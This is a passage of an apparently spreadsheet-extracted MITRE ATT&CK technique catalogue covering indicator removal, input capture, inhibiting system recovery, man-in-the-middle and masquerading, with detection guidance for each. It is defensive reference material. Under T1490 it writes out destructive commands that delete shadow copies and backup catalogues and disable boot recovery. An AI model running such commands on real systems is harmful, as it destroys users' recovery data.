There are tools available from the host operating system to perform cleanup, but adversaries may use other tools as well. Examples include native [cmd](https://attack.mitre.org/software/S0106) functions such as DEL, secure deletion tools such as Windows Sysinternals SDelete, or other third-party file deletion tools. (Citation: Trend Micro APT Attack Tools)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1070/004</t>
  </si>
  <si>
    <t>It may be uncommon for events related to benign command-line functions such as DEL or third-party utilities or tools to be found in an environment, depending on the user base and how systems are typically used. Monitoring for command-line deletion functions to correlate with binaries or other files that an adversary may drop and remove may lead to detection of malicious activity. Another good practice is monitoring for known deletion and secure deletion tools that are not already on systems within an enterprise network that an adversary could introduce. Some monitoring tools may collect command-line arguments, but may not capture DEL commands since DEL is a native function within cmd.exe.</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Deletion</t>
  </si>
  <si>
    <t>T1070.005</t>
  </si>
  <si>
    <t>Indicator Removal on Host: Network Share Connection Removal</t>
  </si>
  <si>
    <t>Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation. Windows shared drive and [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002) connections can be removed when no longer needed. [Net](https://attack.mitre.org/software/S0039) is an example utility that can be used to remove network share connections with the &lt;code&gt;net use \\system\share /delete&lt;/code&gt; command. (Citation: Technet Net Use)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1070/005</t>
  </si>
  <si>
    <t>Network share connections may be common depending on how an network environment is used. Monitor command-line invocation of &lt;code&gt;net use&lt;/code&gt; commands associated with establishing and removing remote shares over SMB, including following best practices for detection of [Windows Admin Shares](https://attack.mitre.org/techniques/T1077). SMB traffic between systems may also be captured and decoded to look for related network share session and file transfer activity. Windows authentication logs are also useful in determining when authenticated network shares are established and by which account, and can be used to correlate network share activity to other events to investigate potentially malicious activity.</t>
  </si>
  <si>
    <t>Command: Command Execution, Network Traffic: Network Traffic Content, Process: Process Creation, User Account: User Account Authentication</t>
  </si>
  <si>
    <t>T1070.006</t>
  </si>
  <si>
    <t>Indicator Removal on Host: Timestomp</t>
  </si>
  <si>
    <t>Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Timestomping may be used along with file name [Masquerading](https://attack.mitre.org/techniques/T1036) to hide malware and tools.(Citation: WindowsIR Anti-Forensic Techniques)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1070/006</t>
  </si>
  <si>
    <t>Forensic techniques exist to detect aspects of files that have had their timestamps modified. (Citation: WindowsIR Anti-Forensic Techniques) It may be possible to detect timestomping using file modification monitoring that collects information on file handle opens and can compare timestamp values.</t>
  </si>
  <si>
    <t>File: File Metadata, File: File Modification</t>
  </si>
  <si>
    <t>Romain Dumont, ESET</t>
  </si>
  <si>
    <t>T1202</t>
  </si>
  <si>
    <t>Indirect Command Execution</t>
  </si>
  <si>
    <t>Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters. Various Windows utilities may be used to execute commands, possibly without invoking [cmd](https://attack.mitre.org/software/S0106). For example, [Forfiles](https://attack.mitre.org/software/S0193), the Program Compatibility Assistant (pcalua.exe), components of the Windows Subsystem for Linux (WSL), as well as other utilities may invoke the execution of programs and commands from a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), Run window, or via scripts. (Citation: VectorSec ForFiles Aug 2017) (Citation: Evi1cg Forfiles Nov 2017)
Adversaries may abuse these features for [Defense Evasion](https://attack.mitre.org/tactics/TA0005), specifically to perform arbitrary execution while subverting detections and/or mitigation controls (such as Group Policy) that limit/prevent the usage of [cmd](https://attack.mitre.org/software/S0106) or file extensions more commonly associated with malicious payloads.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1202</t>
  </si>
  <si>
    <t>Monitor and analyze logs from host-based detection mechanisms, such as Sysmon, for events such as process creations that include or are resulting from parameters associated with invoking programs/commands/files and/or spawning child processes/network connections. (Citation: RSA Forfiles Aug 2017)</t>
  </si>
  <si>
    <t>Application control, Application control by file name or path, Static File Analysis</t>
  </si>
  <si>
    <t>T1105</t>
  </si>
  <si>
    <t>Ingress Tool Transfer</t>
  </si>
  <si>
    <t>Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1105</t>
  </si>
  <si>
    <t>Monitor for file creation and files transferred into the network. Unusual processes with external network connections creating files on-system may be suspicious. Use of utilities, such as FTP, that does not normally occur may also be suspicious.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</si>
  <si>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File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow</t>
  </si>
  <si>
    <t>T1490</t>
  </si>
  <si>
    <t>Inhibit System Recovery</t>
  </si>
  <si>
    <t>Adversaries may delete or remove built-in operating system data and turn off services designed to aid in the recovery of a corrupted system to prevent recovery.(Citation: Talos Olympic Destroyer 2018)(Citation: FireEye WannaCry 2017) Operating systems may contain features that can help fix corrupted systems, such as a backup catalog, volume shadow copies, and automatic repair features. Adversaries may disable or delete system recovery features to augment the effects of [Data Destruction](https://attack.mitre.org/techniques/T1485) and [Data Encrypted for Impact](https://attack.mitre.org/techniques/T1486).(Citation: Talos Olympic Destroyer 2018)(Citation: FireEye WannaCry 2017)
A number of native Windows utilities have been used by adversaries to disable or delete system recovery features:
* &lt;code&gt;vssadmin.exe&lt;/code&gt; can be used to delete all volume shadow copies on a system - &lt;code&gt;vssadmin.exe delete shadows /all /quiet&lt;/code&gt;
* [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) can be used to delete volume shadow copies - &lt;code&gt;wmic shadowcopy delete&lt;/code&gt;
* &lt;code&gt;wbadmin.exe&lt;/code&gt; can be used to delete the Windows Backup Catalog - &lt;code&gt;wbadmin.exe delete catalog -quiet&lt;/code&gt;
* &lt;code&gt;bcdedit.exe&lt;/code&gt; can be used to disable automatic Windows recovery features by modifying boot configuration data - &lt;code&gt;bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures &amp; bcdedit /set {default} recoveryenabled no&lt;/code&gt;</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1490</t>
  </si>
  <si>
    <t>02 April 2019</t>
  </si>
  <si>
    <t>Use process monitoring to monitor the execution and command line parameters of binaries involved in inhibiting system recovery, such as vssadmin, wbadmin, and bcdedit. The Windows event logs, ex. Event ID 524 indicating a system catalog was deleted, may contain entries associated with suspicious activity.
Monitor the status of services involved in system recovery. Monitor the registry for changes associated with system recovery features (ex: the creation of &lt;code&gt;HKEY_CURRENT_USER\Software\Policies\Microsoft\PreviousVersions\DisableLocalPage&lt;/code&gt;).</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Deletion, Process: Process Creation, Service: Service Metadata, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>Yonatan Gotlib, Deep Instinct</t>
  </si>
  <si>
    <t>T1056</t>
  </si>
  <si>
    <t>Input Capture</t>
  </si>
  <si>
    <t>Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. [Credential API Hooking](https://attack.mitre.org/techniques/T1056/004)) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. [Web Portal Capture](https://attack.mitre.org/techniques/T1056/003)).</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1056</t>
  </si>
  <si>
    <t>Collection, Credential Access</t>
  </si>
  <si>
    <t>Detection may vary depending on how input is captured but may include monitoring for certain Windows API calls (e.g. `SetWindowsHook`, `GetKeyState`, and `GetAsyncKeyState`)(Citation: Adventures of a Keystroke), monitoring for malicious instances of [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), and ensuring no unauthorized drivers or kernel modules that could indicate keylogging or API hooking are present.</t>
  </si>
  <si>
    <t>Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>T1056.004</t>
  </si>
  <si>
    <t>Input Capture: Credential API Hooking</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.(Citation: Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017) Unlike [Keylogging](https://attack.mitre.org/techniques/T1056/001),  this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
* **Hooks procedures**, which intercept and execute designated code in response to events such as messages, keystrokes, and mouse inputs.(Citation: Microsoft Hook Overview)(Citation: Elastic Process Injection July 2017)
* **Import address table (IAT) hooking**, which use modifications to a process’s IAT, where pointers to imported API functions are stored.(Citation: Elastic Process Injection July 2017)(Citation: Adlice Software IAT Hooks Oct 2014)(Citation: MWRInfoSecurity Dynamic Hooking 2015)
* **Inline hooking**, which overwrites the first bytes in an API function to redirect code flow.(Citation: Elastic Process Injection July 2017)(Citation: HighTech Bridge Inline Hooking Sept 2011)(Citation: MWRInfoSecurity Dynamic Hooking 2015)
</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1056/004</t>
  </si>
  <si>
    <t>Monitor for calls to the `SetWindowsHookEx` and `SetWinEventHook` functions, which install a hook procedure.(Citation: Microsoft Hook Overview)(Citation: Volatility Detecting Hooks Sept 2012) Also consider analyzing hook chains (which hold pointers to hook procedures for each type of hook) using tools(Citation: Volatility Detecting Hooks Sept 2012)(Citation: PreKageo Winhook Jul 2011)(Citation: Jay GetHooks Sept 2011) or by programmatically examining internal kernel structures.(Citation: Zairon Hooking Dec 2006)(Citation: EyeofRa Detecting Hooking June 2017)
Rootkits detectors(Citation: GMER Rootkits) can also be used to monitor for various types of hooking activity.
Verify integrity of live processes by comparing code in memory to that of corresponding static binaries, specifically checking for jumps and other instructions that redirect code flow. Also consider taking snapshots of newly started processes(Citation: Microsoft Process Snapshot) to compare the in-memory IAT to the real addresses of the referenced functions.(Citation: StackExchange Hooks Jul 2012)(Citation: Adlice Software IAT Hooks Oct 2014)</t>
  </si>
  <si>
    <t>Process: OS API Execution, Process: Process Metadata</t>
  </si>
  <si>
    <t>T1056.002</t>
  </si>
  <si>
    <t>Input Capture: GUI Input Capture</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may mimic common operating system GUI components to prompt users for credentials with a seemingly legitimate prompt. When programs are executed that need additional privileges than are present in the current user context, it is common for the operating system to prompt the user for proper credentials to authorize the elevated privileges for the task (ex: [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002)).
Adversaries may mimic this functionality to prompt users for credentials with a seemingly legitimate prompt for a number of reasons that mimic normal usage, such as a fake installer requiring additional access or a fake malware removal suite.(Citation: OSX Malware Exploits MacKeeper) This type of prompt can be used to collect credentials via various languages such as AppleScript(Citation: LogRhythm Do You Trust Oct 2014)(Citation: OSX Keydnap malware) and PowerShell(Citation: LogRhythm Do You Trust Oct 2014)(Citation: Enigma Phishing for Credentials Jan 2015). </t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1056/002</t>
  </si>
  <si>
    <t>Monitor process execution for unusual programs as well as malicious instances of [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059) that could be used to prompt users for credentials.
Inspect and scrutinize input prompts for indicators of illegitimacy, such as non-traditional banners, text, timing, and/or sources.</t>
  </si>
  <si>
    <t>Process: Process Creation</t>
  </si>
  <si>
    <t>Matthew Molyett, @s1air, Cisco Talos</t>
  </si>
  <si>
    <t>T1056.001</t>
  </si>
  <si>
    <t>Input Capture: Keylogging</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may log user keystrokes to intercept credentials as the user types them. Keylogging is likely to be used to acquire credentials for new access opportunities when [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) efforts are not effective, and may require an adversary to intercept keystrokes on a system for a substantial period of time before credentials can be successfully captured.
Keylogging is the most prevalent type of input capture, with many different ways of intercepting keystrokes.(Citation: Adventures of a Keystroke) Some methods include:
* Hooking API callbacks used for processing keystrokes. Unlike [Credential API Hooking](https://attack.mitre.org/techniques/T1056/004), this focuses solely on API functions intended for processing keystroke data.
* Reading raw keystroke data from the hardware buffer.
* Windows Registry modifications.
* Custom drivers.
* [Modify System Image](https://attack.mitre.org/techniques/T1601) may provide adversaries with hooks into the operating system of network devices to read raw keystrokes for login sessions.(Citation: Cisco Blog Legacy Device Attacks) </t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1056/001</t>
  </si>
  <si>
    <t>Keyloggers may take many forms, possibly involving modification to the Registry and installation of a driver, setting a hook, or polling to intercept keystrokes. Commonly used API calls include `SetWindowsHook`, `GetKeyState`, and `GetAsyncKeyState`.(Citation: Adventures of a Keystroke) Monitor the Registry and file system for such changes, monitor driver installs, and look for common keylogging API calls. API calls alone are not an indicator of keylogging, but may provide behavioral data that is useful when combined with other information such as new files written to disk and unusual processes.</t>
  </si>
  <si>
    <t>Driver: Driver Load, Process: OS API Execution, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>T1056.003</t>
  </si>
  <si>
    <t>Input Capture: Web Portal Capture</t>
  </si>
  <si>
    <t>Adversaries may install code on externally facing portals, such as a VPN login page, to capture and transmit credentials of users who attempt to log into the service. For example, a compromised login page may log provided user credentials before logging the user in to the service.
This variation on input capture may be conducted post-compromise using legitimate administrative access as a backup measure to maintain network access through [External Remote Services](https://attack.mitre.org/techniques/T1133) and [Valid Accounts](https://attack.mitre.org/techniques/T1078) or as part of the initial compromise by exploitation of the externally facing web service.(Citation: Volexity Virtual Private Keylogging)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1056/003</t>
  </si>
  <si>
    <t>File monitoring may be used to detect changes to files in the Web directory for organization login pages that do not match with authorized updates to the Web server's content.</t>
  </si>
  <si>
    <t>File: File Modification</t>
  </si>
  <si>
    <t>T1559</t>
  </si>
  <si>
    <t>Inter-Process Communication</t>
  </si>
  <si>
    <t>Adversaries may abuse inter-process communication (IPC) mechanisms for local code or command execution. IPC is typically used by processes to share data, communicate with each other, or synchronize execution. IPC is also commonly used to avoid situations such as deadlocks, which occurs when processes are stuck in a cyclic waiting pattern. 
Adversaries may abuse IPC to execute arbitrary code or commands. IPC mechanisms may differ depending on OS, but typically exists in a form accessible through programming languages/libraries or native interfaces such as Windows [Dynamic Data Exchange](https://attack.mitre.org/techniques/T1559/002) or [Component Object Model](https://attack.mitre.org/techniques/T1559/001). Higher level execution mediums, such as those of [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059)s, may also leverage underlying IPC mechanisms.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1559</t>
  </si>
  <si>
    <t>Monitor for strings in files/commands, loaded DLLs/libraries, or spawned processes that are associated with abuse of IPC mechanisms.</t>
  </si>
  <si>
    <t>Module: Module Load, Process: Process Creation, Script: Script Execution</t>
  </si>
  <si>
    <t>T1559.001</t>
  </si>
  <si>
    <t>Inter-Process Communication: Component Object Model</t>
  </si>
  <si>
    <t>Adversaries may use the Windows Component Object Model (COM) for local code execution. COM is an inter-process communication (IPC) component of the native Windows application programming interface (API) that enables interaction between software objects, or executable code that implements one or more interfaces.(Citation: Fireeye Hunting COM June 2019) Through COM, a client object can call methods of server objects, which are typically binary Dynamic Link Libraries (DLL) or executables (EXE).(Citation: Microsoft COM)
Various COM interfaces are exposed that can be abused to invoke arbitrary execution via a variety of programming languages such as C, C++, Java, and [Visual Basic](https://attack.mitre.org/techniques/T1059/005).(Citation: Microsoft COM) Specific COM objects also exist to directly perform functions beyond code execution, such as creating a [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053), fileless download/execution, and other adversary behaviors related to privilege escalation and persistence.(Citation: Fireeye Hunting COM June 2019)(Citation: ProjectZero File Write EoP Apr 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1559/001</t>
  </si>
  <si>
    <t xml:space="preserve">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t>
  </si>
  <si>
    <t>T1559.002</t>
  </si>
  <si>
    <t>Inter-Process Communication: Dynamic Data Exchange</t>
  </si>
  <si>
    <t>Adversaries may use Windows Dynamic Data Exchange (DDE) to execute arbitrary commands. DDE is a client-server protocol for one-time and/or continuous inter-process communication (IPC) between applications. Once a link is established, applications can autonomously exchange transactions consisting of strings, warm data links (notifications when a data item changes), hot data links (duplications of changes to a data item), and requests for command execution.
Object Linking and Embedding (OLE), or the ability to link data between documents, was originally implemented through DDE. Despite being superseded by [Component Object Model](https://attack.mitre.org/techniques/T1559/001), DDE may be enabled in Windows 10 and most of Microsoft Office 2016 via Registry keys. (Citation: BleepingComputer DDE Disabled in Word Dec 2017) (Citation: Microsoft ADV170021 Dec 2017) (Citation: Microsoft DDE Advisory Nov 2017)
Microsoft Office documents can be poisoned with DDE commands (Citation: SensePost PS DDE May 2016) (Citation: Kettle CSV DDE Aug 2014), directly or through embedded files (Citation: Enigma Reviving DDE Jan 2018), and used to deliver execution via [Phishing](https://attack.mitre.org/techniques/T1566) campaigns or hosted Web content, avoiding the use of Visual Basic for Applications (VBA) macros. (Citation: SensePost MacroLess DDE Oct 2017) DDE could also be leveraged by an adversary operating on a compromised machine who does not have direct access to a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059).</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1559/002</t>
  </si>
  <si>
    <t>Monitor processes for abnormal behavior indicative of DDE abuse, such as Microsoft Office applications loading DLLs and other modules not typically associated with the application or these applications spawning unusual processes (such as cmd.exe).
OLE and Office Open XML files can be scanned for ‘DDEAUTO', ‘DDE’, and other strings indicative of DDE execution.(Citation: NVisio Labs DDE Detection Oct 2017)</t>
  </si>
  <si>
    <t>T1534</t>
  </si>
  <si>
    <t>Internal Spearphishing</t>
  </si>
  <si>
    <t>Adversaries may use internal spearphishing to gain access to additional information or exploit other users within the same organization after they already have access to accounts or systems within the environment. Internal spearphishing is multi-staged attack where an email account is owned either by controlling the user's device with previously installed malware or by compromising the account credentials of the user. Adversaries attempt to take advantage of a trusted internal account to increase the likelihood of tricking the target into falling for the phish attempt.(Citation: Trend Micro When Phishing Starts from the Inside 2017)
Adversaries may leverage [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001) or [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002) as part of internal spearphishing to deliver a payload or redirect to an external site to capture credentials through [Input Capture](https://attack.mitre.org/techniques/T1056) on sites that mimic email login interfaces.
There have been notable incidents where internal spearphishing has been used. The Eye Pyramid campaign used phishing emails with malicious attachments for lateral movement between victims, compromising nearly 18,000 email accounts in the process.(Citation: Trend Micro When Phishing Starts from the Inside 2017) The Syrian Electronic Army (SEA) compromised email accounts at the Financial Times (FT) to steal additional account credentials. Once FT learned of the attack and began warning employees of the threat, the SEA sent phishing emails mimicking the Financial Times IT department and were able to compromise even more users.(Citation: THE FINANCIAL TIMES LTD 2019.)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1534</t>
  </si>
  <si>
    <t>Network intrusion detection systems and email gateways usually do not scan internal email, but an organization can leverage the journaling-based solution which sends a copy of emails to a security service for offline analysis or incorporate service-integrated solutions using on-premise or API-based integrations to help detect internal spearphishing attacks.(Citation: Trend Micro When Phishing Starts from the Inside 2017)</t>
  </si>
  <si>
    <t>Application Log: Application Log Content, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow</t>
  </si>
  <si>
    <t>Swetha Prabakaran, Microsoft Threat Intelligence Center (MSTIC); Tim MalcomVetter</t>
  </si>
  <si>
    <t>T1570</t>
  </si>
  <si>
    <t>Lateral Tool Transfer</t>
  </si>
  <si>
    <t>Adversaries may transfer tools or other files between systems in a compromised environment. Files may be copied from one system to another to stage adversary tools or other files over the course of an operation. Adversaries may copy files laterally between internal victim systems to support lateral movement using inherent file sharing protocols such as file sharing over SMB to connected network shares or with authenticated connections with [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002) or [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001). Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1570</t>
  </si>
  <si>
    <t>Monitor for file creation and files transferred within a network using protocols such as SMB. Unusual processes with internal network connections creating files on-system may be suspicious. Consider monitoring for abnormal usage of utilities and command-line arguments that may be used in support of remote transfer of files. Considering monitoring for alike file hashes or characteristics (ex: filename) that are created on multiple hosts.</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Creation, File: File Metadata, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: Process Creation</t>
  </si>
  <si>
    <t>T1185</t>
  </si>
  <si>
    <t>Man in the Browser</t>
  </si>
  <si>
    <t>Adversaries can take advantage of security vulnerabilities and inherent functionality in browser software to change content, modify behavior, and intercept information as part of various man in the browser techniques. (Citation: Wikipedia Man in the Browser)
A specific example is when an adversary injects software into a browser that allows an them to inherit cookies, HTTP sessions, and SSL client certificates of a user and use the browser as a way to pivot into an authenticated intranet. (Citation: Cobalt Strike Browser Pivot) (Citation: ICEBRG Chrome Extensions)
Browser pivoting requires the SeDebugPrivilege and a high-integrity process to execute. Browser traffic is pivoted from the adversary's browser through the user's browser by setting up an HTTP proxy which will redirect any HTTP and HTTPS traffic. This does not alter the user's traffic in any way. The proxy connection is severed as soon as the browser is closed. Whichever browser process the proxy is injected into, the adversary assumes the security context of that process. Browsers typically create a new process for each tab that is opened and permissions and certificates are separated accordingly. With these permissions, an adversary could browse to any resource on an intranet that is accessible through the browser and which the browser has sufficient permissions, such as Sharepoint or webmail. Browser pivoting also eliminates the security provided by 2-factor authentication. (Citation: cobaltstrike manual)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1185</t>
  </si>
  <si>
    <t>This is a difficult technique to detect because adversary traffic would be masked by normal user traffic. No new processes are created and no additional software touches disk. Authentication logs can be used to audit logins to specific web applications, but determining malicious logins versus benign logins may be difficult if activity matches typical user behavior. Monitor for process injection against browser applications.</t>
  </si>
  <si>
    <t>Logon Session: Logon Session Creation, Process: Process Access</t>
  </si>
  <si>
    <t>Justin Warner, ICEBRG</t>
  </si>
  <si>
    <t>T1557</t>
  </si>
  <si>
    <t>Man-in-the-Middle</t>
  </si>
  <si>
    <t>Adversaries may attempt to position themselves between two or more networked devices using a man-in-the-middle (MiTM) technique to support follow-on behaviors such as [Network Sniffing](https://attack.mitre.org/techniques/T1040) or [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002). By abusing features of common networking protocols that can determine the flow of network traffic (e.g. ARP, DNS, LLMNR, etc.), adversaries may force a device to communicate through an adversary controlled system so they can collect information or perform additional actions.(Citation: Rapid7 MiTM Basics)
Adversaries may leverage the MiTM position to attempt to modify traffic, such as in [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002). Adversaries can also stop traffic from flowing to the appropriate destination, causing denial of service.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1557</t>
  </si>
  <si>
    <t>Monitor network traffic for anomalies associated with known MiTM behavior. Consider monitoring for modifications to system configuration files involved in shaping network traffic flow.</t>
  </si>
  <si>
    <t>Network Traffic: Network Traffic Flow, Network Traffic: Network Traffic Flow, Service: Service Creation, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>Daniil Yugoslavskiy, @yugoslavskiy, Atomic Threat Coverage project</t>
  </si>
  <si>
    <t>T1557.002</t>
  </si>
  <si>
    <t>Man-in-the-Middle: ARP Cache Poisoning</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may poison Address Resolution Protocol (ARP) caches to position themselves between the communication of two or more networked devices. This activity may be used to enable follow-on behaviors such as [Network Sniffing](https://attack.mitre.org/techniques/T1040) or [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002).
The ARP protocol is used to resolve IPv4 addresses to link layer addresses, such as a media access control (MAC) address.(Citation: RFC826 ARP) Devices in a local network segment communicate with each other by using link layer addresses. If a networked device does not have the link layer address of a particular networked device, it may send out a broadcast ARP request to the local network to translate the IP address to a MAC address. The device with the associated IP address directly replies with its MAC address. The networked device that made the ARP request will then use as well as store that information in its ARP cache.
An adversary may passively wait for an ARP request to poison the ARP cache of the requesting device. The adversary may reply with their MAC address, thus deceiving the victim by making them believe that they are communicating with the intended networked device. For the adversary to poison the ARP cache, their reply must be faster than the one made by the legitimate IP address owner. Adversaries may also send a gratuitous ARP reply that maliciously announces the ownership of a particular IP address to all the devices in the local network segment.
The ARP protocol is stateless and does not require authentication. Therefore, devices may wrongly add or update the MAC address of the IP address in their ARP cache.(Citation: Sans ARP Spoofing Aug 2003)(Citation: Cylance Cleaver)
Adversaries may use ARP cache poisoning as a means to man-in-the-middle (MiTM) network traffic. This activity may be used to collect and/or relay data such as credentials, especially those sent over an insecure, unencrypted protocol.(Citation: Sans ARP Spoofing Aug 2003)
</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1557/002</t>
  </si>
  <si>
    <t>Monitor network traffic for unusual ARP traffic, gratuitous ARP replies may be suspicious. 
Consider collecting changes to ARP caches across endpoints for signs of ARP poisoning. For example, if multiple IP addresses map to a single MAC address, this could be an indicator that the ARP cache has been poisoned.</t>
  </si>
  <si>
    <t>Jon Sternstein, Stern Security</t>
  </si>
  <si>
    <t>T1557.001</t>
  </si>
  <si>
    <t>Man-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay</t>
  </si>
  <si>
    <t>By responding to LLMNR/NBT-NS network traffic, adversaries may spoof an authoritative source for name resolution to force communication with an adversary controlled system. This activity may be used to collect or relay authentication materials. 
Link-Local Multicast Name Resolution (LLMNR) and NetBIOS Name Service (NBT-NS) are Microsoft Windows components that serve as alternate methods of host identification. LLMNR is based upon the Domain Name System (DNS) format and allows hosts on the same local link to perform name resolution for other hosts. NBT-NS identifies systems on a local network by their NetBIOS name. (Citation: Wikipedia LLMNR) (Citation: TechNet NetBIOS)
Adversaries can spoof an authoritative source for name resolution on a victim network by responding to LLMNR (UDP 5355)/NBT-NS (UDP 137) traffic as if they know the identity of the requested host, effectively poisoning the service so that the victims will communicate with the adversary controlled system. If the requested host belongs to a resource that requires identification/authentication, the username and NTLMv2 hash will then be sent to the adversary controlled system. The adversary can then collect the hash information sent over the wire through tools that monitor the ports for traffic or through [Network Sniffing](https://attack.mitre.org/techniques/T1040) and crack the hashes offline through [Brute Force](https://attack.mitre.org/techniques/T1110) to obtain the plaintext passwords. In some cases where an adversary has access to a system that is in the authentication path between systems or when automated scans that use credentials attempt to authenticate to an adversary controlled system, the NTLMv2 hashes can be intercepted and relayed to access and execute code against a target system. The relay step can happen in conjunction with poisoning but may also be independent of it. (Citation: byt3bl33d3r NTLM Relaying)(Citation: Secure Ideas SMB Relay)
Several tools exist that can be used to poison name services within local networks such as NBNSpoof, Metasploit, and [Responder](https://attack.mitre.org/software/S0174). (Citation: GitHub NBNSpoof) (Citation: Rapid7 LLMNR Spoofer) (Citation: GitHub Responder)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1557/001</t>
  </si>
  <si>
    <t>Monitor &lt;code&gt;HKLM\Software\Policies\Microsoft\Windows NT\DNSClient&lt;/code&gt; for changes to the "EnableMulticast" DWORD value. A value of “0” indicates LLMNR is disabled. (Citation: Sternsecurity LLMNR-NBTNS)
Monitor for traffic on ports UDP 5355 and UDP 137 if LLMNR/NetBIOS is disabled by security policy.
Deploy an LLMNR/NBT-NS spoofing detection tool.(Citation: GitHub Conveigh) Monitoring of Windows event logs for event IDs 4697 and 7045 may help in detecting successful relay techniques.(Citation: Secure Ideas SMB Relay)</t>
  </si>
  <si>
    <t>Eric Kuehn, Secure Ideas; Matthew Demaske, Adaptforward</t>
  </si>
  <si>
    <t>T1036</t>
  </si>
  <si>
    <t>Masquerading</t>
  </si>
  <si>
    <t>Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Renaming abusable system utilities to evade security monitoring is also a form of [Masquerading](https://attack.mitre.org/techniques/T1036).(Citation: LOLBAS Main Site)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1036</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</si>
  <si>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Look for indications of common characters that may indicate an attempt to trick users into misidentifying the file type, such as a space as the last character of a file name or the right-to-left override characters"\u202E", "[U+202E]", and "%E2%80%AE”.</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata</t>
  </si>
  <si>
    <t>Bartosz Jerzman; David Lu, Tripwire; Elastic; Felipe Espósito, @Pr0teus; Nick Carr, FireEye; Oleg Kolesnikov, Securonix</t>
  </si>
  <si>
    <t>Application control by file name or path</t>
  </si>
  <si>
    <t>T1036.001</t>
  </si>
  <si>
    <t>Masquerading: Invalid Code Signature</t>
  </si>
  <si>
